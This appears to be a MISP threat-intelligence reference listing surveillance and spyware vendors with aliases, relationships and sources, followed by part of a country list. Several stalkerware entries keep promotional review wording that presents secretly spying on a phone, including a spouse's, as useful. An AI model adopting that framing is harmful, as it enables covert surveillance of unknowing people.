Mobile Spy is a cell phone monitoring application for iOS, Android and BlackBerry developed by Retina-X Studios. It allows you to monitor the smartphone activity of your children. You’ll be able to see text messages, track GPS locations, monitor social media activities, view call details and more inside a secure online account. Monitoring made easy. Login anytime you wish from any location to see the recorded data without needing access to the monitored phone. The hidden version of Mobile Spy is no longer available due to legal issues.

The tag is: misp-galaxy:surveillance-vendor="Mobile Spy"

Table 11718. Table References

Links

https://www.bestphonespy.com/mobile-spy-review/

Hoverwatch

Hoverwatch is a computer and mobile monitoring software developed by Refog. It is available for Android, Windows and macOS. It runs silently in the background, recording all activities performed by the user such as messages sent and received, phone calls made and received, web sites visited, and every keystroke typed. All recorded data is sent to an online account.

The tag is: misp-galaxy:surveillance-vendor="Hoverwatch"

Table 11719. Table References

Links

https://www.bestphonespy.com/hoverwatch-review/

MobiStealth

MobiStealth is a popular spy software that comes with a simple web-based console and powerful monitoring features. It is developed by Infoweise Pty Ltd, a private company headquartered in Sydney, Australia. They have been making high quality monitoring solutions since 2009. In November 2015, they launched a “Non-Jailbreak” feature, letting users spy on all iOS devices without needing to jailbreak them. Just like many other spy software, MobiStealth allows you to spy on a cell phone or computer via a web interface called StealthClub. As its name implies, it is a stealth application that runs in the background without the owner’s knowledge.

The tag is: misp-galaxy:surveillance-vendor="MobiStealth"

Table 11720. Table References

Links

https://www.bestphonespy.com/mobistealth-review/

Spyera

Spyera develops and sells computer and mobile spy software. Based in Hong Kong, Spyera’s products work in all languages and all countries. The company’s phone and PC monitoring products are useful tools for any parent or company, although they are quite expensive in comparison to other products. Spyera comes in three different versions — a mobile version for iPhone and Android smartphones, a tablet version for iPad and Android tablets, and a desktop version for Mac and Windows. The mobile version of Spyera is actually very similar to the FlexiSPY Extreme, which I reviewed a few weeks ago. It has everything you’d expect from a cell phone spy software: live call listening, call recording, and location tracking.

The tag is: misp-galaxy:surveillance-vendor="Spyera"

Table 11721. Table References

Links

https://www.bestphonespy.com/spyera-review/

StealthGenie

StealthGenie is a powerful cell phone spy software created by InvoCode Ltd in 2010 that can be used to spy on cheating spouses and monitor children’s activities. In September 2014, Hammad Akbar, founder of StealthGenie, was arrested in Los Angeles and charged with selling mobile device spyware. StealthGenie was officially discontinued on 26 September 2014.

The tag is: misp-galaxy:surveillance-vendor="StealthGenie"

Table 11722. Table References

Links

https://www.bestphonespy.com/stealthgenie-review/

SpyBubble

SpyBubble is a spy app that lets you secretly spy on someone’s phone. This spy app is compatible with a variety of mobile devices, including iPhone, Android, BlackBerry and Symbian, and it offers logging features for most cell phone activity. SpyBubble doesn’t provide the blocking and restricting features that you will find in several similar applications. However, it has many useful features, and its monitoring features are excellent. Spybubble cell phone spy software was discontinued due to legal reasons

The tag is: misp-galaxy:surveillance-vendor="SpyBubble"

Table 11723. Table References

Links

https://www.bestphonespy.com/spybubble-review/

Cytrox

Cytrox’s Israeli companies were founded in 2017 as Cytrox EMEA Ltd. and Cytrox Software Ltd. Perhaps taking a page from Candiru’s corporate obfuscation playbook, both of those companies were renamed in 2019 to Balinese Ltd. and Peterbald Ltd., respectively. We also observed one entity in Hungary, Cytrox Holdings Zrt, which was also formed in 2017.

The tag is: misp-galaxy:surveillance-vendor="Cytrox"

Cytrox is also known as:

  • Cytrox EMEA Ltd.

  • Cytrox Software Ltd.

  • Balinese Ltd.

  • Peterbald Ltd.

  • Cytrox Holdings Zrt

Cytrox has relationships with:

  • is-acquired-by: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Senpai" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Nexa" with estimative-language:likelihood-probability="likely"

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

Table 11724. Table References

Links

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/

RCSLab

RCS Lab S.p.A., Italian vendor likely using Tykelab Srl as a front company.

The tag is: misp-galaxy:surveillance-vendor="RCSLab"

RCSLab is also known as:

  • RCS Lab

Table 11725. Table References

Links

https://www.rcslab.it/en/index.html

https://www.lookout.com/blog/hermit-spyware-discovery

https://www.vice.com/en/article/nz75wd/european-surveillance-companies-agt-rcs-sell-syria-tools-of-oppression

Aglaya

Aglaya, a contractor based in Delhi, India, emerged into the public eye in 2014 following its attempt to secure a substantial annual contract worth $5 billion. This surge in prominence was largely driven by the actions of Ankur Srivastava, Aglaya’s CEO and founder, who purportedly proposed the outsourcing of surveillance and hacking services to various governments.

The tag is: misp-galaxy:surveillance-vendor="Aglaya"

Table 11726. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/59weqb/a-spyware-company-audaciously-offers-cyber-nukes

Interionet

Interionet Systems Ltd., headquartered in Herzliya, Israel, is a privately-held company recognized for its approach in the cyber intelligence domain, particularly catering to law enforcement and intelligence agencies. The firm, founded by ex-NSO team members, is dedicated to the development of sophisticated cyber-intrusion and mobile interception tools.

The tag is: misp-galaxy:surveillance-vendor="Interionet"

Table 11727. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.intelligenceonline.com/surveillance—​interception/2019/05/14/interionet-former-nso-team-s-new-offensive-cyber-firm,108357090-art

https://www.interionet.com/

Intellexa

The Intellexa alliance is an evolving group of companies and brands that have been involved in developing and marketing a wide range of surveillance products including advanced spyware, mass surveillance platforms, and tactical systems for targeting and intercepting nearby devices. The corporate entities of the alliance span various jurisdictions, both within and outside the EU. The exact nature of links between these companies is shrouded in secrecy as corporate entities, and the structures between them, are constantly morphing, renaming, rebranding, and evolving.

The tag is: misp-galaxy:surveillance-vendor="Intellexa"

Intellexa has relationships with:

  • known-as: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

Table 11728. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://securitylab.amnesty.org/latest/2023/10/technical-deep-dive-into-intellexa-alliance-surveillance-products/

https://www.spiegel.de/international/business/the-predator-files-european-spyware-consortium-supplied-despots-and-dictators-a-2fd8043f-c5c1-4b05-b5a6-e8f8b9949978

https://blog.google/threat-analysis-group/0-days-exploited-by-commercial-surveillance-vendor-in-egypt/

Merlinx / Equus Technologies

Merlinx / Equus Technologies, Israeli firm, a privately held company specializing in the development of tailor made innovative solutions for law enforcement, intelligence agencies, and national security organizations. Linked to the Android malware, also sells iOS capabilities.

The tag is: misp-galaxy:surveillance-vendor="Merlinx / Equus Technologies"

Table 11729. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/evdebz/google-revealed-an-israeli-spyware-company-that-has-quietly-sold-its-wares-for-years

AQSACOM

AQSACOM, French company - lawful interception for IP networks. All Aqsacom’s security products can be combined in a powerful solution so that Telecommunications and ISP operators can provide the Authorities with a reliable and professional service.

The tag is: misp-galaxy:surveillance-vendor="AQSACOM"

Table 11730. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://aqsacom.com/

Area

Area Spa is a firm based near Milan that sells monitoring systems capable of capturing internet traffic, tapping conversations, and tracking targets through GPS.

The tag is: misp-galaxy:surveillance-vendor="Area"

Table 11731. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/gv5knx/italian-cops-raid-surveillance-tech-company-area-spa-selling-spy-gear-to-syria

https://www.area.it/en/

ClearTrail

ClearTrail Technologies, India based company, known for developing or selling systems for monitoring computers, mobile phones and emails of unsuspecting masses.

The tag is: misp-galaxy:surveillance-vendor="ClearTrail"

Table 11732. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.clear-trail.com/about-us/

https://www.business-standard.com/article/companies/the-two-men-behind-india-s-secret-surveillance-industry-111120300053_1.html

Elaman

Elaman is a German company that sell a wide array of surveillance technologies. From vast monitoring centres capable of monitoring thousands of conversations simultaneously to trojans that target individual’s devices specifically. They don’t create these products, they resell from other surveillance companies. They have sold products from VASTech, Gamma, Utimaco and Nokia Siemens Networks. This catalogue gives an insight into one of the surveillance industries biggest middle man.

The tag is: misp-galaxy:surveillance-vendor="Elaman"

Table 11733. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.elaman.de/

https://privacyinternational.org/blog/1540/elaman-and-gamma-whats-selling-and-whos-buying-indonesia

Gita Technologies

Gita Technologies, Israeli based company with a mission to be a worldwide leader in research and development of high-end security systems and SIGINT.

The tag is: misp-galaxy:surveillance-vendor="Gita Technologies"

Table 11734. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://gitatechnologies.com/

Innova

Innova, based in Trieste, Italy, and a frequent supplier of Italian prosecutor’s offices. It was the only Italian firm at the International Exhibition for National Security and Resilience (ISNR), which was held in Abu Dhabi in October 2022. The exhibition connects regional government agencies with manufacturers from around the world, and was organised in cooperation with the Ministry of the Interior and in strategic partnership with Abu Dhabi Police GHQ. The United Arab Emirates, however, is known for human rights violations, some of which facilitated by the use of digital surveillance technology, as in the case of an iPhone spyware that was used against hundreds of activists, foreign leaders and suspected terrorists, according to Reuters. Innova’s foreign presence did not stop at ISNR. The company was also at ISS World Latin America, which took place in Panama in October 2022, and was among the sponsors of the September event of ISS World Asia Pacific 2022 in Singapore. These trade shows are not mere opportunities for display, but allow direct contact with members of intelligence agencies from various countries, law enforcement officials and government leaders or ministers.

The tag is: misp-galaxy:surveillance-vendor="Innova"

Table 11735. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://irpimedia.irpi.eu/en-italian-spyware-on-the-international-market/

Jenovice

Jenovice, an Israeli firm that flies under the radar has invented a remotely-operated WiFi interception device that can facilitate spy missions. Jenovice Cyber Labs' Piranha exploits vulnerabilities in WiFi networks to connect an attacker to as many as 50 targeted devices at once.

The tag is: misp-galaxy:surveillance-vendor="Jenovice"

Table 11736. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://cyberscoop.com/jenovice-cyber-labs-metropolink-city-wide-surveillance/

https://www.jenovice.com/

Lumacron

Lumacron, a British startup which is developing interception tools to capture the massive data flows that transit through the principal international communications networks.

The tag is: misp-galaxy:surveillance-vendor="Lumacron"

Table 11737. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.intelligenceonline.com/surveillance—​interception/2018/06/19/lumacron-extends-interception-to-undersea-cables,108314081-art

NeoSoft

NeoSoft AG, Switzerland manufacturer of Passive, Active (Semi-Active), Hybrid GSM Monitoring systems with A5.2/A5.1 deciphering, CDMA Passive Monitoring systems, IMSI/IMEI Catchers 2G/3G, InPoint SMS System (sends SMS to everybody). All NeoSoft systems support the following bands: GSM, PCS, EGSM, 2100, 850. NeoSoft has world-wide experience.

The tag is: misp-galaxy:surveillance-vendor="NeoSoft"

Table 11738. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.burojansen.nl/pdf/ISSWorldEuropejune2011sponsorsfromwebsite.pdf

https://riskybiznews.substack.com/p/risky-biz-news-australia-passes-new

https://www.neosoft.ch/

Nexa

Nexa Technologies was indicted for complicity in acts of torture, the French firm is accused of having sold surveillance equipment to the Egypt.

The tag is: misp-galaxy:surveillance-vendor="Nexa"

Nexa is also known as:

  • Nexa Technologies

Nexa has relationships with:

  • is-allied-with: misp-galaxy:surveillance-vendor="Senpai" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

Table 11739. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://securityaffairs.com/125083/intelligence/nexa-technologies-indicted.html

https://wearenexa.com/aboutus/

Norsi-Trans

Norsi-Trans produces SIGINT and lawful interception equipment and software for the Russian government and also sells an OSINT platform called Vitok-ROI (or Vitok-OSINT).

The tag is: misp-galaxy:surveillance-vendor="Norsi-Trans"

Table 11740. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://keyfindings.blog/2020/03/23/be-careful-what-you-osint-with/

https://norsi-trans.com/

Polaris Wireless

Polaris Wireless, US based company that specializes in the development of wireless surveillance products.

The tag is: misp-galaxy:surveillance-vendor="Polaris Wireless"

Table 11741. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.zdnet.com/google-amp/article/polaris-wireless-secures-contract-in-surveillance-tracking-software/

Pro4Tech

Pro4Tech, Tel Aviv/Israel based company which provides tactical surveillance systems designed by field-professionals for law-enforcement and government agencies.

The tag is: misp-galaxy:surveillance-vendor="Pro4Tech"

Table 11742. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.israeldefense.co.il/en/content/israeli-companies-milopol-pro4tech

Rayzone

Rayzone, Israeli cyber intelligence company. The surveillance software makes it possible, among other things, to locate a person’s location and path of movement with an accuracy of one meter and makes it possible to receive additional information from the applications on the target’s device.

The tag is: misp-galaxy:surveillance-vendor="Rayzone"

Table 11743. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.haaretz.com/israel-news/tech-news/2020-12-17/ty-article/israeli-spy-tech-firm-tracked-mobile-users-around-the-world-investigation-suggests/0000017f-e76b-da9b-a1ff-ef6f847c0000

Seartech

Seartech is a South African company specializing in the design and manufacture of tactical surveillance equipment.

The tag is: misp-galaxy:surveillance-vendor="Seartech"

Table 11744. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.seartech.co.za/

Securcube

Securcube s.r.l is an Italian company that specializes in services and products for the Digital Forensics..

The tag is: misp-galaxy:surveillance-vendor="Securcube"

Table 11745. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://securcube.net/

Septier

Septier Communication Ltd, with global headquarters in Israel and offices across several continentshas dozens of installations serving telecommunication operators and law-enforcement agencies and organizations throughout the world. Septier develops and markets comprehensive lawful interception systems which include cutting-edge monitor centers and passive front ends based on high capacity signaling monitoring probes.

The tag is: misp-galaxy:surveillance-vendor="Septier"

Table 11746. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.israeldefense.co.il/company/septier-communication-ltd

Cy4gate

Cy4gate, Italian based company, sells its products worldwide, including to dictatorships, while competing with companies involved in scandals related to repression of opponents and journalists.

The tag is: misp-galaxy:surveillance-vendor="Cy4gate"

Table 11747. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://irpimedia.irpi.eu/en-surveillances-cy4gate/

https://www.vice.com/en/article/m7awav/prosecutors-suspend-cy4gate-government-spyware-used-in-whatsapp-phishing-attacks

Toka

Toka, Israeli based company, which offers its police, government and intelligence clients the ability to obtain targeted intelligence and conduct forensic investigations as well as covert operations. In addition, Toka offers governments its Cyber Designers service, which provides agencies with the full-spectrum strategies, customized projects, and technologies needed to ensure the security and sustainability of critical infrastructure, the digital landscape, and government institutions.

The tag is: misp-galaxy:surveillance-vendor="Toka"

Table 11748. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.haaretz.com/israel-news/security-aviation/2022-12-26/ty-article-magazine/.premium/this-dystopian-cyber-firm-could-have-saved-mossad-assassins-from-exposure/00000185-0bc6-d26d-a1b7-dbd739100000

https://www.orishas-finance.com/actualite/5310?lang=en

Trovicor

Trovicor, Germany based companies’ surveillance technology allegedly used in connection with human rights abuses by authoritarian govts.

The tag is: misp-galaxy:surveillance-vendor="Trovicor"

Table 11749. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.business-humanrights.org/en/latest-news/response-by-trovicor-german-companies-surveillance-technology-allegedly-used-in-connection-with-human-rights-abuses-by-authoritarian-govts/

https://trovicor.com/

Utimaco

Utimaco, Aachen/Germany based company which praises itself as market leader in eavesdropping technology.

The tag is: misp-galaxy:surveillance-vendor="Utimaco"

Table 11750. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://digit.site36.net/2022/03/07/utimaco-german-wiretapping-technology-could-strengthen-junta-in-myanmar/

Wintego

Wintego Systems develops advanced communication, intelligence, and data-decoding solutions for the government and homeland security sectors.

The tag is: misp-galaxy:surveillance-vendor="Wintego"

Table 11751. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.forbes.com/sites/thomasbrewster/2016/09/29/wintego-whatsapp-encryption-surveillance-exploits/?sh=53f93cd1aa95

Wispear

Wispear Systems Ltd (renamed Passitoria Ltd), provides interception equipment designed for the extraction of voice or data, transmitted over the air interface.

The tag is: misp-galaxy:surveillance-vendor="Wispear"

Wispear has relationships with:

  • acquires: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with : misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with : misp-galaxy:surveillance-vendor="Nexa" with estimative-language:likelihood-probability="likely"

  • is-allied-with : misp-galaxy:surveillance-vendor="Senpai" with estimative-language:likelihood-probability="likely"

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

Table 11752. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://in-cyprus.philenews.com/local/surveillance-software-has-been-exported-from-cyprus/

DarkMatter

DarkMatter founded in the United Arab Emirates (UAE) was under investigation by the FBI for crimes including digital espionage services, involvement in the Jamal Khashoggi assassination, and incarceration of foreign dissidents.

The tag is: misp-galaxy:surveillance-vendor="DarkMatter"

Table 11753. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://en.wikipedia.org/wiki/DarkMatter_Group

Lench

Lench IT Solutions, Germany based company. Lench IT Solutions plc has a UK-based branch, Gamma International Ltd in Andover, England, and a Germany-based branch, Gamma International GmbH in Munich. FinFisher, also known as FinSpy, is surveillance software marketed by Lench IT Solutions plc.

The tag is: misp-galaxy:surveillance-vendor="Lench"

Table 11754. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://en.wikipedia.org/wiki/FinFisher

GR Sistemi

GR Sistemi, Italian firm that’s been trying to enter the crowded market of government spyware, also known by insiders as lawful interception.

The tag is: misp-galaxy:surveillance-vendor="GR Sistemi"

Table 11755. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/kbyg7a/government-spyware-maker-doxes-itself-by-linking-to-its-site-in-malware-code

SS8

SS8, US based company is selling to a range of US government agencies as well as exporting surveillance equipment abroad. SS8 were also reportedly responsible for selling intrusion systems to the United Arab Emirates.

The tag is: misp-galaxy:surveillance-vendor="SS8"

Table 11756. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://privacyinternational.org/sites/default/files/2017-12/global_surveillance_0.pdf

Wolf Intelligence

Wolf Intelligence a Germany-based spyware company that made headlines for sending a bodyguard to Mauritania and prompting an international incident after the local government detained the bodyguard as collateral for a deal went wrong, left a trove of its own data exposed online.

The tag is: misp-galaxy:surveillance-vendor="Wolf Intelligence"

Table 11757. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/vbka8b/wolf-intelligence-leak-customer-victim-data-online

https://www.vice.com/en/article/wxq85w/scam-spyware-vendor-gets-caught-once-again

Vervata

Vervata, Thailand-based software company, which among other, provides mobile monitoring applications that secretly records all activity on a phone.

The tag is: misp-galaxy:surveillance-vendor="Vervata"

Table 11758. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.gmanetwork.com/news/topstories/nation/3072/new-program-snoops-on-cell-phones/story/

https://www.forbes.com/sites/thomasbrewster/2017/02/16/government-iphone-android-spyware-is-the-same-as-seedy-spouseware/?sh=3a06dacb455c

Raxir

Raxir, Italy based surveillance firm that is housed in Naples, in a tech startup incubator. According to the company’s page on the incubator’s website, Raxir was founded in 2013 and produces software systems to support legal and intelligence investigations.

The tag is: misp-galaxy:surveillance-vendor="Raxir"

Table 11759. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/9a3g4e/malware-hunters-catch-new-android-spyware-raxir

Senpai

Senpai Technologies is a company specializing in OSINT and persona creation based out of Israel, while WiSpear, also based in Israel, specializes in Wi-Fi interception.

The tag is: misp-galaxy:surveillance-vendor="Senpai"

Senpai is also known as:

  • Senpai Technologies

Senpai has relationships with:

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Nexa" with estimative-language:likelihood-probability="likely"

Table 11760. Table References

Links

https://blog.talosintelligence.com/intellexa-and-cytrox-intel-agency-grade-spyware/

Target Information

Description of targets of threat actors..

Target Information is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

Luxembourg

The tag is: misp-galaxy:target-information="Luxembourg"

Luxembourg is also known as:

  • Grand Duchy of Luxembourg

  • Grand-Duché de Luxembourg

  • Lëtzebuerg

  • Groussherzogtum Lëtzebuerg

  • Luxemburg

  • Großherzogtum Luxemburg

Afghanistan

The tag is: misp-galaxy:target-information="Afghanistan"

Afghanistan is also known as:

  • افغانستان

  • Afġānistān

  • Afġānestān

  • Islamic Republic of Afghanistan

Albania

The tag is: misp-galaxy:target-information="Albania"

Albania is also known as:

  • Shqipëri

  • Shqipëria

  • Shqipni

  • Shqipnia

  • Shqypni

  • Shqypnia

  • Republic of Albania

Algeria

The tag is: misp-galaxy:target-information="Algeria"

Algeria is also known as:

  • الجزائر‎

  • al-Jazāʾir

  • الدزاير‎

  • al-dzāyīr

  • People’s Democratic Republic of Algeria

American Samoa

The tag is: misp-galaxy:target-information="American Samoa"

American Samoa is also known as:

  • Amerika Sāmoa

  • Amelika Sāmoa

  • Sāmoa Amelika

Andorra

The tag is: misp-galaxy:target-information="Andorra"

Andorra is also known as:

  • Principality of Andorra

  • Principat d’Andorra

  • Principality of the Valleys of Andorra

  • Principat de les Valls d’Andorra

Angola

The tag is: misp-galaxy:target-information="Angola"

Angola is also known as:

  • Republic of Angola

  • República de Angola

  • Repubilika ya Ngola

Anguilla

The tag is: misp-galaxy:target-information="Anguilla"

Antarctica

The tag is: misp-galaxy:target-information="Antarctica"

Antigua and Barbuda

The tag is: misp-galaxy:target-information="Antigua and Barbuda"

Argentina

The tag is: misp-galaxy:target-information="Argentina"

Argentina is also known as:

  • Argentine Republic

  • República Argentina

Armenia

The tag is: misp-galaxy:target-information="Armenia"

Armenia is also known as:

  • Հայաստան

  • Hayastan

  • Republic of Armenia

  • Հայաստանի Հանրապետություն

  • Hayastani Hanrapetut’yun

Aruba

The tag is: misp-galaxy:target-information="Aruba"

Aruba is also known as:

  • Papiamento

Australia

The tag is: misp-galaxy:target-information="Australia"

Australia is also known as:

  • Commonwealth of Australia

Austria

The tag is: misp-galaxy:target-information="Austria"

Austria is also known as:

  • Österreich

  • Republic of Austria

  • Republik Österreich

Azerbaijan

The tag is: misp-galaxy:target-information="Azerbaijan"

Azerbaijan is also known as:

  • Azərbaycan

  • Republic of Azerbaijan

  • Azərbaycan Respublikası

Bahamas

The tag is: misp-galaxy:target-information="Bahamas"

Bahamas is also known as:

  • Commonwealth of The Bahamas

  • The Bahamas

Bahrain

The tag is: misp-galaxy:target-information="Bahrain"

Bahrain is also known as:

  • al-Baḥrayn

  • Kingdom of Bahrain

  • مملكة البحرين‎

  • Mamlakat al-Baḥrayn

  • البحرين

Bangladesh

The tag is: misp-galaxy:target-information="Bangladesh"

Bangladesh is also known as:

  • বাংলাদেশ

  • The country of Bengal

  • People’s Republic of Bangladesh

  • গণপ্রজাতন্ত্রী বাংলাদেশ

  • Gônoprojatontri Bangladesh

Barbados

The tag is: misp-galaxy:target-information="Barbados"

Belarus

The tag is: misp-galaxy:target-information="Belarus"

Belarus is also known as:

  • Беларусь

  • Republic of Belarus

  • Рэспубліка Беларусь

  • Республика Беларусь

  • Byelorussia

  • Belorussia

  • Белоруссия

Belgium

The tag is: misp-galaxy:target-information="Belgium"

Belgium is also known as:

  • België

  • Royaume de Belgique

  • Königreich Belgien

  • Kingdom of Belgium

  • Koninkrijk België

Belize

The tag is: misp-galaxy:target-information="Belize"

Benin

The tag is: misp-galaxy:target-information="Benin"

Benin is also known as:

  • Bénin

  • Republic of Benin

  • République du Bénin

Bermuda

The tag is: misp-galaxy:target-information="Bermuda"

Bermuda is also known as:

  • Islands of Bermuda

Bhutan

The tag is: misp-galaxy:target-information="Bhutan"

Bhutan is also known as:

  • འབྲུག་ཡུལ

  • Druk Yul

  • Kingdom of Bhutan

  • འབྲུག་རྒྱལ་ཁབ

  • Druk Gyal Khap

Bolivia

The tag is: misp-galaxy:target-information="Bolivia"

Bolivia is also known as:

  • Mborivia

  • Puliwya

  • Wuliwya

  • Plurinational State of Bolivia

  • Estado Plurinacional de Bolivia

  • Tetã Hetãvoregua Mborivia

  • Puliwya Mamallaqta

  • Wuliwya Suyu

Bosnia and Herzegovina

The tag is: misp-galaxy:target-information="Bosnia and Herzegovina"

Bosnia and Herzegovina is also known as:

  • BiH

  • B&H

  • Bosnia–Herzegovina

  • Bosnia

Botswana

The tag is: misp-galaxy:target-information="Botswana"

Botswana is also known as:

  • Republic of Botswana

  • Lefatshe la Botswana

Brazil

The tag is: misp-galaxy:target-information="Brazil"

Brazil is also known as:

  • Federative Republic of Brazil

British Indian Ocean Territory

The tag is: misp-galaxy:target-information="British Indian Ocean Territory"

British Indian Ocean Territory is also known as:

  • BIOT

British Virgin Islands

The tag is: misp-galaxy:target-information="British Virgin Islands"

British Virgin Islands is also known as:

  • BVI

  • Virgin Islands

Brunei

The tag is: misp-galaxy:target-information="Brunei"

Brunei is also known as:

  • Nation of Brunei, the Abode of Peace

  • Negara Brunei Darussalam (Rumi script)

  • نڬارا بروني دارالسلام

Bulgaria

The tag is: misp-galaxy:target-information="Bulgaria"

Bulgaria is also known as:

  • България

  • Bǎlgariya

  • Republic of Bulgaria

  • Република България

  • Republika Bǎlgariya

Burkina Faso

The tag is: misp-galaxy:target-information="Burkina Faso"

Burundi

The tag is: misp-galaxy:target-information="Burundi"

Burundi is also known as:

  • Republic of Burundi

  • Republika y’Uburundi

  • République du Burundi

Cambodia

The tag is: misp-galaxy:target-information="Cambodia"

Cambodia is also known as:

  • Kampuchea

  • Cambodge

  • ព្រះរាជាណាចក្រកម្ពុជ

  • prĕəh riəciənaacak kampuciə

  • Royaume du Cambodge

Cameroon

The tag is: misp-galaxy:target-information="Cameroon"

Cameroon is also known as:

  • Cameroun

  • Republic of Cameroon

  • République du Cameroun

  • Renndaandi Kamerun

Canada

The tag is: misp-galaxy:target-information="Canada"

Cape Verde

The tag is: misp-galaxy:target-information="Cape Verde"

Cape Verde is also known as:

  • Cabo Verde

  • Republic of Cabo Verde

  • República de Cabo Verde

  • Repúblika di Kabu Verdi

Cayman Islands

The tag is: misp-galaxy:target-information="Cayman Islands"

Central African Republic

The tag is: misp-galaxy:target-information="Central African Republic"

Central African Republic is also known as:

  • CAR

  • Renndaandi Afirka Cakaari

  • Ködörösêse tî Bêafrîka

  • République centrafricaine

  • Centrafrique

Chad

The tag is: misp-galaxy:target-information="Chad"

Chad is also known as:

  • تشاد‎

  • Tshād

  • Tchad

  • Republic of Chad

  • République du Tchad

  • جمهورية تشاد

  • Jumhūriyyat Tshād

Chile

The tag is: misp-galaxy:target-information="Chile"

Chile is also known as:

  • Republic of Chile

  • República de Chile (Spanish)

  • Chile Wüdalmapu

  • Chili Suyu

  • Chili Ripuwlika

  • Repūvirika o Tire

China

The tag is: misp-galaxy:target-information="China"

China is also known as:

  • 中国

  • Zhōngguó

  • People’s Republic of China

  • PRC

  • 中华人民共和国

  • Zhōnghuá Rénmín Gònghéguó

